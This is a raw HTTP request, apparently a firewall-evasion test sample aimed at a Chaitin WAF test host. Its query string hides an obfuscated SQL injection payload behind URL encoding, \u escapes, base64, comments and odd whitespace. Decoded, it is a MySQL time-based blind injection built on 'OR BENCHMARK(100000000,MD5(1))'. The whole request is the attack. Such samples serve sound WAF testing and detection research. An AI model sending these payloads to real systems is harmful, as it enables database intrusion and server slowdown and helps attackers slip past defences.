GET /strangler%20pattern/customized?granular=angle%20brackets&periodically=%7B%09%20%22%5Cu0070%5Cu0061%5Cu0074%5Cu0074%5Cu0065%5Cu0072%5Cu006E%22%3A%20%0A%22%5Cu0070%5Cu006F%5Cu006c%5Cu0069%5Cu0063%5Cu0079%22%09%2C%22%5Cu006d%5Cu0075%5Cu0074%5Cu0061%5Cu0062%5Cu006C%5Cu0065%22%0A%3A%2054%0D%2C%0D%22%5Cu006C%5Cu006f%5Cu0063%5Cu0061%5Cu0074%5Cu0069%5Cu006F%5Cu006E%22%0A%3A%0D%20%22%5Cu004D%5Cu0053%5Cu006B%5Cu0067%5Cu0049%5Cu0079%5Cu0042%5Cu0068%5Cu0065%5Cu006d%5Cu006C%5Cu0074%5Cu0064%5Cu0058%5Cu0052%5Cu006F%5Cu0063%5Cu0033%5Cu0042%5Cu0073%5Cu0061%5Cu0058%5Cu0052%5Cu007a%5Cu0064%5Cu0058%5Cu004E%5Cu0077%5Cu005A%5Cu0057%5Cu0035%5Cu006B%5Cu005A%5Cu0057%5Cu0051%5Cu0067%5Cu0043%5Cu006b%5Cu0039%5Cu0053%5Cu0049%5Cu0079%5Cu0042%5Cu0079%5Cu005A%5Cu0058%5Cu004E%5Cu0031%5Cu0062%5Cu0057%5Cu0056%5Cu0076%5Cu0062%5Cu006d%5Cu0056%5Cu0030%5Cu0062%5Cu0032%5Cu004E%5Cu006A%5Cu0063%5Cu006d%5Cu0039%5Cu0077%5Cu0063%5Cu0047%5Cu0056%5Cu006B%5Cu0062%5Cu0057%5Cu0056%5Cu007a%5Cu0063%5Cu0032%5Cu0046%5Cu006E%5Cu005A%5Cu0053%5Cu0041%5Cu004b%5Cu0049%5Cu0079%5Cu0042%5Cu007a%5Cu005A%5Cu006E%5Cu0052%5Cu0077%5Cu0059%5Cu006D%5Cu0039%5Cu0079%5Cu005a%5Cu0047%5Cu0056%5Cu0079%5Cu0062%5Cu0057%5Cu0068%5Cu0030%5Cu0062%5Cu0057%5Cu0078%5Cu007A%5Cu0063%5Cu0047%5Cu0056%5Cu0068%5Cu0061%5Cu0032%5Cu0056%5Cu0079%5Cu0064%5Cu0033%5Cu0042%5Cu0068%5Cu0064%5Cu0058%5Cu0052%5Cu0076%5Cu0063%5Cu0047%5Cu0046%5Cu0069%5Cu0062%5Cu0033%5Cu004A%5Cu0030%5Cu005a%5Cu0057%5Cu0052%5Cu006d%5Cu005A%5Cu0058%5Cu0052%5Cu006a%5Cu0061%5Cu0047%5Cu006C%5Cu0075%5Cu005A%5Cu0079%5Cu0041%5Cu004B%5Cu0051%5Cu006B%5Cu0056%5Cu004f%5Cu0051%5Cu0030%5Cu0068%5Cu004E%5Cu0051%5Cu0058%5Cu004A%5Cu004C%5Cu004b%5Cu0044%5Cu0045%5Cu0077%5Cu004D%5Cu0044%5Cu0041%5Cu0077%5Cu004d%5Cu0044%5Cu0041%5Cu0077%5Cu004C%5Cu0045%5Cu0031%5Cu0045%5Cu004E%5Cu0053%5Cu0067%5Cu0078%5Cu004B%5Cu0053%5Cu006B%5Cu006a%22%0A%2C%22%5Cu006d%5Cu0061%5Cu006e%5Cu0061%5Cu0067%5Cu0065%5Cu0072%22%20%3A%0A%22%5Cu0073%5Cu0075%5Cu0062%5Cu0073%5Cu0065%5Cu0071%5Cu0075%5Cu0065%5Cu006e%5Cu0074%22%20%7D%0A HTTP/1.1
Host: waf-ce.chaitin.cn
Cache-Control: no-cache
Pragma: no-cache
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-ca; KFJWI Build/IMM76D) AppleWebKit/537.36 (KHTML, like Gecko) Silk/3.68 like Chrome/39.0.2171.93 Safari/537.36
Cookie: introspect=alter; consumption=optional; integration=characteristic; SESSIONID=4802ac04a859ea57c70874cf115a9b138c5ef81fdb781642e92078bc748f4573653af4c636f2872aa2eda6a4ca23683d

